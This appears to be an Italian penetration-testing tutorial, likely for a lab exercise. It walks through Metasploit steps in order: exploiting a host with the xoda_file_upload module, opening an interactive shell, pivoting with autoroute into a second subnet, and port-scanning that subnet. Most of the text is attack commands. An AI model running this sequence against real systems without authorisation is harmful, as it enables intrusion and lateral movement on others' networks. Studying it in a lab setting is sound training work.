Tutorials
Host Discovery with Pivoting
Metasploit Pivoting e Scansione di Host con Moduli Ausiliari ---
#enumeration#metasploit
Metasploit Pivoting e Scansione di Host con Moduli Ausiliari
1. Avvio di Metasploit e Database
Avviare il database PostgreSQL e Metasploit:
bash
service postgresql start
msfconsole
db_status # Verifica che il database sia attivo2. Scansione Iniziale dell'Host
Utilizzare db_nmap per scansionare l'host target e raccogliere informazioni sui servizi:
bash
db_nmap -sV -sC -sS -T4 -O -p80 192.27.190.33. Sfruttamento della Vulnerabilità
Selezionare e configurare il modulo di exploit:
bash
use unix/webapp/xoda_file_upload
show options # Mostra le opzioni disponibili
set <opzioni_necessarie> # Configurare l'exploit
exploit # Eseguire l'exploit4. Ottenere una Shell Interattiva
Dopo aver ottenuto l'accesso alla macchina target:
bash
shell
/bin/bash -i # Per ottenere una shell interattiva
ifconfig # Visualizzare le interfacce di reteIdentificare l'altro IP appartenente a una subnet diversa (es. 192.185.27.2).
5. Pivoting con Autoroute
Uscire dalla shell e configurare il pivoting:
bash
run autoroute -s 192.185.27.2 # Aggiungere una route per la subnet remotaMettere la sessione in background:
bash
background # Spostare la sessione in backgroundOra possiamo eseguire moduli ausiliari sulla subnet dell'host compromesso.
6. Scansione di Porte sulla Subnet Pivotata
#### Scansione delle porte TCP:
bash
search portscan # Cercare un modulo di port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.185.27.2
run#### Scansione delle porte UDP:
bash
search udp_sweep # Cercare un modulo per la scansione UDP
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.185.27.2
run